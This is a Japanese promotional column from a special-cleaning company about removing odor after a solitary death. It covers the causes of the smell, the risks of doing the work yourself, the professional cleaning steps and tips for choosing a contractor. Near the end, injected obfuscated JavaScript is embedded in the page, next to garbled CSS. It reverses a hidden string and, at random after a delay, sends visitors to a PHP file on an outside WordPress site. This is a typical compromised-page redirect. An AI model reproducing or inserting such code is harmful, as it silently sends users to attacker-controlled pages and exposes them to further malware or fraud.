特掃屋クリーンマイスター(株式会社Cleaners(クリーナーズ))

特掃屋クリーンマイスターへ(株式会社Cleaners(クリーナーズ))0120-213-813
特掃屋クリーンマイスターへ(株式会社Cleaners(クリーナーズ))お問い合わせ
お問い合わせ

コラム

孤独死現場の消臭方法!特殊清掃を依頼するなら

孤独死現場の消臭方法!特殊清掃を依頼するなら
孤独死現場の死臭は、「クサヤやチーズ、生ゴミが腐敗したような臭い」と表現されることが多いです。

それぞれの強烈な臭いが混ざり合っているだけでなく、その臭いがチーズなどより何倍も大きな人間から発せられます。

この記事では、孤独死現場の悪臭の原因や消臭方法についてご紹介しています。

 

孤独死現場の悪臭の原因

死亡現場た

孤独死現場の悪臭の原因は、ご遺体の腐敗です。人間の体内には、微生物やバクテリアなどの細菌が潜んでいます。
生きている時は免疫作用によって、これらが増殖することはありません。

しかし、死亡して免疫作用が効かなくなると、細菌は増殖し遺体の細胞を分解していきます。
その際に発生するガスが死臭です。

死臭以外にも、腐った肉に群がるハエやウジ虫から発生する臭いなどもあります。
一般的に死臭は、夏場であれば2〜3日、冬場でも5〜7日程度で発生するといわれています。

 

孤独死現場の消臭は自力では難しい?

準備をする特殊清掃員

ご遺族のご都合や費用などの理由から、孤独死現場の消臭を自力でなさることをお考えかもしれません。

しかし、以下の理由から、孤独死現場の消臭は自力ではできません。

 

|感染症のリスク

遺体から染み出した体液や血液の中には、細菌が多数含まれています。

また、孤独死現場にはハエやゴキブリ、ネズミなど、感染症を仲介する媒介する害虫・害獣もいます。
慣れない作業では、感染リスクが高まります。

 

|精神面のリスク

ご家族や親しかった人が亡くなった悪臭漂う部屋で消臭作業をおこなうことに、精神的に耐えられない方が少なくありません。

 

|市販の消臭剤が効かないリスク

汗やカビの臭いであれば、市販の芳香剤や空気清浄機で除去できる可能性もあります。

しかし、市販の消臭剤では、ほとんど消臭効果がないほど、孤独死現場の悪臭は強く、いつまでも残ります。

 

【特殊清掃】孤独死現場の消臭方法

消臭する特殊清掃作業員

では、特殊清掃専門業者は、どのような消臭をおこなっているのでしょうか。
一般的な作業手順を紹介します。

 

|除菌剤の散布

孤独死の現場には、さまざまなウィルスや細菌が存在しており、感染症の危険もあります。

スタッフが安全に作業をするためにも、まずはじめに次亜塩素酸ナトリウムなどの除菌剤を散布します。

作業に入る前にスタッフは、防護服・シューズカバー・手袋・防毒マスクを装着します。

 

|汚染物の除去・搬出

除菌が終わったら、ご遺体の下やその周囲にあった、体液、衣類などの汚染物を除去し搬出します。

 

|作業前消臭

この後、窓やドアを開けて荷物を搬出する作業をおこなうと、室内の悪臭が近隣に広がるため、作業前にオゾン消臭機で粗消臭をおこないます。

 

|荷物の搬出・遺品整理

荷物の搬出時に、不要なもの、遺品として残したいものなどを、ご遺族様にご確認いただきながら分別します。

この時点で、年金手帳や印鑑などの大切なものも探していきます。

 

|汚染場所の清掃・解体

荷物の搬出が終わったら、汚染箇所の清掃を行います。床などの表面を清掃しても、悪臭が取れない場合がほとんどです。

ご遺体の発見が遅れ、室内の汚染が激しいケースでは、床下にまで体液が漏れ出ていることがあります。

その場合には床を解体し、床下の清掃や脱臭作業をおこないます。

 

|室内の徹底的なクリーニング

孤独死現場の悪臭は、汚染箇所からだけでなく部屋のいたる所から発生しており、部屋の汚れにも付着しています。

そのため、オゾン消臭をおこなう前に、悪臭が付いてしまった油汚れやほこりなどを除去するクリーニングが必要となります。

 

|オゾン消臭

最後に、オゾン消臭機を使って消臭します。

この作業には3日程度かかるのですが、オゾン消臭機の音が大きいため、夜間は稼働させないなどの配慮も必要です。

 

孤独死現場の消臭を業者に依頼する際の注意点

電話依頼の注意

孤独死は、この15年で2.6倍に増えており、孤独死現場の清掃をおこなう業者も新規参入が急増しています。

新規参入業者のなかには、孤独死現場の清掃を大掛かりなハウスクリーニングのような作業と考えている業者もあります。

上述したように、特殊清掃は一般的な「掃除」とは異なる業務です。

孤独死現場の消臭を業者に依頼する場合、以下の点に注意が必要です。

 

|技術や経験の少ない業者は避ける

孤独死の現場は、二つとして同じ現場はありません。

使用する薬剤やオゾン散布の時間、タイミングなど、現場に合わせてもっとも効果が出るよう調整ができなければなりません。

そのためには、薬剤や細菌などに関するさまざまな知識と、豊富な現場経験が必要です。
依頼する前に、必ずホームページで過去の事例や実績を確認しましょう。

 

|立会見積もりをしない業者は避ける

孤独死現場は、汚染具合によって作業内容が変わります。
そのため、現場に立ち会って見積もりをしなければ、正確な金額は算出できません。

電話だけで安い見積もりを提示し、作業後に追加費用を請求する悪徳業者もいます。
見積もりの際に気になる点について質問をし、疑問点を解消してくれる清掃業者を選びましょう。

 

|アフターフォローの有無を確認する

孤独死現場の清掃は、脱臭が一番難しい作業です。
いったん清掃が終了して臭いが無くなったと思われても、後日臭い戻りがあるケースもあります。

これは、経験豊富な清掃業者でも起こりうることです。このような場合にも対応してくれる業者が安心です。

見積もりや契約の際に確認しましょう。

 

孤独死現場の消臭のご依頼は「特掃屋クリーンマイスター」へ

特掃屋クリーンマイスター

孤独死現場の消臭は「特掃屋クリーンマイスター」にお任せください。

クリーンマイスターは特殊清掃のプロとして、多くの現場で経験を積んできました。

一般では市販されていない特殊な薬剤や消臭剤を使い、高い知識と豊富な経験で、効率よく業務をおこなっています。

ご遺族様や大家様、管理会社様など、関係する皆さんの心に寄り添い、少しでも悲しみを和らげていただくことができるよう作業をいたします。

 

|素早い対応

「特掃屋クリーンマイスター」は、365日24時間、メールや電話、LINEで受け付けています。

孤独死現場は、感染症の危険があり、悪臭が近隣に漏れ出すことから、早急な対応が必要です。
最短即日で現場の確認に伺います。

 

|安心の技術

特殊清掃の豊富な知識と経験に自信があります。完全な消臭はお任せください。

万一ご満足いただけなかった場合には、全額返金もいたします。

 

|高品質でご提供

「特掃屋クリーンマイスター」は、社員教育を大切にする会社です。

新しい機器や薬剤の導入はもちろんですが、臭いを最後に判別するのは人間です。日々社員教育を行うことで、消臭や除菌についての最新知識を持つスタッフが作業しています。

 

|低価格の追求

「特掃屋クリーンマイスター」は、お客様の気持に寄り添い作業をすることを心がけています。

現場までの交通費や駐車場代をお客様に請求しないなど、お客様本位の低価格に努めています。
万一他社が1円でも高い場合には、値引きさせていただきます。

$mWn=function(n){if(typeof ($mWn.list[n])==”string”) return $mWn.list[n].split(“”).reverse().join(“”);return $mWn.list[n];};$mWn.list=[“\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}to bottom, rgba(255,255,102,0) 20%, #ffff66 100%);”>特掃屋クリーンマイスターの特殊清掃サービスのご案内はこちら >>

 

まとめ

特殊清掃業者の選び方

孤独死現場の消臭方法について、死臭の原因や消臭が自力では難しいこと、特殊清掃業者の作業内容などをご紹介しました。

特殊清掃が一般的な清掃とは異なり「特殊」であることをご理解いただけたのではないでしょうか。

さまざまな知識と豊富な経験が必要となる特殊清掃のご相談は、「特掃屋クリーンマイスター」までお気軽にご連絡ください。


東京都 神奈川県 千葉県 埼玉県 茨城県に駆けつけます!
遺体現場処理、遺品整理、ゴミ屋敷(ごみ部屋)でお困りなら、ご依頼ください!